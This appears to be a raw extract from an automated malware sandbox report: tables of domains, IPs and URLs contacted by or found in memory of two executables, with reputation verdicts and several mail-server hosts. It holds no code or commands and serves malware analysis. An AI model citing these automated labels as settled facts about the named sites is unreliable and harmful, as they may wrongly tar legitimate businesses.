                  http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                  http://www.naoi-a.com/0%Avira URL Cloudsafe
                  http://www.abdg.com/0%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/js/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                  http://www.evcpa.com/m10%Avira URL Cloudsafe
                  http://www.rs-ag.com/.0)v0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/modules/contentDisplay/contentDisplay.mod.css0%Avira URL Cloudsafe
                  http://www.valselit.com/177-appartement-a-vendre-sigean-30378100%Avira URL Cloudmalware
                  http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/0%Avira URL Cloudsafe
                  http://www.olras.com/W0%Avira URL Cloudsafe
                  http://gholographic.com/0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.22/Museumsuferfest-2013-23.-25.08.2013.html0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen0%Avira URL Cloudsafe
                  https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                  https://www.ora-ito.com/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                  http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.00%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                  https://www.lrsuk.com/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                  http://myropcb.com/login/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.90%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  impexnc.com
                  204.11.56.48
                  truefalseunknown
                  webways.com
                  188.114.96.7
                  truetrue
                    unknown
                    www.fcwcvt.org
                    188.114.97.7
                    truetrue
                      unknown
                      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                      3.130.204.160
                      truefalse
                        high
                        enguita.net
                        195.5.116.23
                        truefalse
                          unknown
                          dataform.co.uk
                          83.223.113.46
                          truetrue
                            unknown
                            evcpa.com
                            192.124.249.10
                            truefalse
                              unknown
                              shittas.com
                              208.91.197.46
                              truefalse
                                unknown
                                kallman.net
                                185.76.64.25
                                truefalse
                                  unknown
                                  bible.org
                                  104.20.55.214
                                  truefalse
                                    high
                                    missnue.com
                                    104.21.234.121
                                    truetrue
                                      unknown
                                      gphpedit.org
                                      127.0.0.1
                                      truefalse
                                        unknown
                                        jsaps.com
                                        49.212.235.59
                                        truefalse
                                          unknown
                                          pohlfood.com
                                          104.218.10.254
                                          truefalse
                                            unknown
                                            canasil.com
                                            172.67.68.180
                                            truetrue
                                              unknown
                                              www.jenco.co.uk
                                              104.21.23.9
                                              truefalse
                                                unknown
                                                www.tyrns.com
                                                62.75.216.137
                                                truefalse
                                                  unknown
                                                  nts-web.net
                                                  49.212.235.175
                                                  truetrue
                                                    unknown
                                                    willsub.com
                                                    69.89.107.122
                                                    truefalse
                                                      high
                                                      ldh.la.gov
                                                      75.2.95.235
                                                      truefalse
                                                        high
                                                        shesfit.com
                                                        188.114.97.7
                                                        truetrue
                                                          unknown
                                                          www.vexcom.com
                                                          172.67.173.200
                                                          truefalse
                                                            unknown
                                                            tcpoa.com
                                                            159.89.244.183
                                                            truetrue
                                                              unknown
                                                              kevyt.net
                                                              104.21.2.101
                                                              truefalse
                                                                unknown
                                                                www.mobilnic.net
                                                                154.203.14.100
                                                                truefalse
                                                                  unknown
                                                                  s5w.com
                                                                  192.99.226.184
                                                                  truefalse
                                                                    unknown
                                                                    www.sclover3.com
                                                                    157.112.182.239
                                                                    truefalse
                                                                      unknown
                                                                      paraski.org
                                                                      94.130.164.242
                                                                      truetrue
                                                                        unknown
                                                                        in1.smtp.messagingengine.com
                                                                        103.168.172.220
                                                                        truetrue
                                                                          unknown
                                                                          dog-jog.net
                                                                          153.122.24.177
                                                                          truefalse
                                                                            unknown
                                                                            kamptal.at
                                                                            128.204.134.138
                                                                            truefalse
                                                                              unknown
                                                                              bd-style.com
                                                                              103.112.69.92
                                                                              truefalse
                                                                                unknown
                                                                                ora.ecnet.jp
                                                                                60.43.154.138
                                                                                truefalse
                                                                                  high
                                                                                  adventist.ro
                                                                                  49.12.155.123
                                                                                  truefalse
                                                                                    unknown
                                                                                    www.edimart.hu
                                                                                    81.2.194.241
                                                                                    truefalse
                                                                                      unknown
                                                                                      zupraha.cz
                                                                                      77.78.104.3
                                                                                      truetrue
                                                                                        unknown
                                                                                        isom.org
                                                                                        192.124.249.14
                                                                                        truetrue
                                                                                          unknown
                                                                                          any-s.net
                                                                                          108.170.12.50
                                                                                          truefalse
                                                                                            unknown
                                                                                            muhr-soehne.de
                                                                                            5.189.171.125
                                                                                            truefalse
                                                                                              unknown
                                                                                              www.railbook.net
                                                                                              103.224.212.221
                                                                                              truefalse
                                                                                                unknown
                                                                                                hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                34.205.242.146
                                                                                                truefalse
                                                                                                  high
                                                                                                  oaith.ca
                                                                                                  192.124.249.12
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    shztm.ru
                                                                                                    62.122.170.171
                                                                                                    truetrue
                                                                                                      unknown
                                                                                                      akr.co.id
                                                                                                      172.67.33.252
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        www.abdg.com
                                                                                                        192.252.154.18
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          www.spanesi.com
                                                                                                          5.196.166.214
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            aiolos-sa.gr
                                                                                                            188.114.97.7
                                                                                                            truetrue
                                                                                                              unknown
                                                                                                              usadig.com
                                                                                                              198.100.146.220
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                metaforacom.com
                                                                                                                185.42.105.162
                                                                                                                truetrue
                                                                                                                  unknown
                                                                                                                  dhh.la.gov
                                                                                                                  52.200.51.73
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    gmail-smtp-in.l.google.com
                                                                                                                    142.250.27.26
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                      67.195.12.38
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        atbauk.org
                                                                                                                        172.67.196.145
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          cbras.com
                                                                                                                          54.39.198.18
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            www.vazir.se
                                                                                                                            206.191.152.37
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              www.naoi-a.com
                                                                                                                              202.254.236.40
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                18.165.183.69
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  www.valselit.com
                                                                                                                                  193.70.68.254
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    vvsteknik.dk
                                                                                                                                    185.31.76.90
                                                                                                                                    truetrue
                                                                                                                                      unknown
                                                                                                                                      biosolve.com
                                                                                                                                      151.101.130.159
                                                                                                                                      truetrue
                                                                                                                                        unknown
                                                                                                                                        karmy.com.pl
                                                                                                                                        185.253.212.22
                                                                                                                                        truetrue
                                                                                                                                          unknown
                                                                                                                                          www.fe-bauer.de
                                                                                                                                          3.65.101.129
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            smtp.mail.global.gm0.yahoodns.net
                                                                                                                                            87.248.97.36
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              hbfuels.com
                                                                                                                                              85.233.160.146
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                td-ccm-neg-87-45.wixdns.net
                                                                                                                                                34.149.87.45
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  pb-games.com
                                                                                                                                                  173.254.28.29
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    mackusick.de
                                                                                                                                                    217.160.0.131
                                                                                                                                                    truetrue
                                                                                                                                                      unknown
                                                                                                                                                      nekono.net
                                                                                                                                                      202.172.28.187
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        cvswl.org
                                                                                                                                                        188.114.97.7
                                                                                                                                                        truetrue
                                                                                                                                                          unknown
                                                                                                                                                          fnw.us
                                                                                                                                                          137.118.26.67
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            komie.com
                                                                                                                                                            59.106.13.181
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              ftmobile.com
                                                                                                                                                              199.34.228.78
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                www.x0c.com
                                                                                                                                                                104.143.9.110
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  onzcda.com
                                                                                                                                                                  35.186.238.101
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    sledsport.ru
                                                                                                                                                                    185.22.232.175
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      www.findbc.com
                                                                                                                                                                      13.248.169.48
                                                                                                                                                                      truetrue
                                                                                                                                                                        unknown
                                                                                                                                                                        tbvlugus.nl
                                                                                                                                                                        174.129.25.170
                                                                                                                                                                        truefalse
                                                                                                                                                                          high
                                                                                                                                                                          pellys.co.uk
                                                                                                                                                                          77.72.4.226
                                                                                                                                                                          truetrue
                                                                                                                                                                            unknown
                                                                                                                                                                            cubodown.com
                                                                                                                                                                            104.21.30.14
                                                                                                                                                                            truefalse
                                                                                                                                                                              unknown
                                                                                                                                                                              infotech.pl
                                                                                                                                                                              79.96.32.254
                                                                                                                                                                              truefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                tozzhin.com
                                                                                                                                                                                202.94.166.30
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  tabbles.net
                                                                                                                                                                                  80.211.41.39
                                                                                                                                                                                  truetrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    cqdgroup.com
                                                                                                                                                                                    221.132.33.88
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      www.muhr-soehne.de
                                                                                                                                                                                      5.189.171.125
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        fortknox.bm
                                                                                                                                                                                        216.177.137.32
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          camamat.com
                                                                                                                                                                                          104.21.235.31
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            mail.airmail.net
                                                                                                                                                                                            66.226.70.66
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              ikulani.com
                                                                                                                                                                                              157.7.107.88
                                                                                                                                                                                              truetrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                lyto.net
                                                                                                                                                                                                188.114.96.7
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  cjborden.com
                                                                                                                                                                                                  15.197.142.173
                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    waldi.pl
                                                                                                                                                                                                    46.242.238.60
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      maktraxx.com
                                                                                                                                                                                                      72.44.93.236
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        websy.com
                                                                                                                                                                                                        13.248.169.48
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          lpver.com
                                                                                                                                                                                                          92.204.129.113
                                                                                                                                                                                                          truetrue
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            106west.com
                                                                                                                                                                                                            148.130.4.196
                                                                                                                                                                                                            truetrue
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              ruzee.com
                                                                                                                                                                                                              207.180.198.201
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                sanfotek.net
                                                                                                                                                                                                                216.69.141.67
                                                                                                                                                                                                                truetrue
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  www.photo4b.com
                                                                                                                                                                                                                  195.78.66.50
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    nblewis.com
                                                                                                                                                                                                                    35.168.185.204
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      mxs.mail.ru
                                                                                                                                                                                                                      217.69.139.150
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                        http://likangds.com/true
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.elpro.si/false
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.credo.edu.pl/false
                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://sigtoa.com/true
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://dhh.la.gov/false
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://www.naoi-a.com/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.abdg.com/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://msl-lock.com/false
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                            https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Sans/stylesheet.cssPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.stajerskagz.si/o-sgz-2/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.com-sit.com/usa/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://www.gpthink.com/c1PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://hotel-amadeus-frankfurt.de/js/form.class.jsPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://ww25.railbook.net/?subid1=20230728-0544-185e-b7f5-be2d330da0b2PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornikPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.alteor.cl/aVXPIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.medius.si/PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.777742716.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687999536.000000000770E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
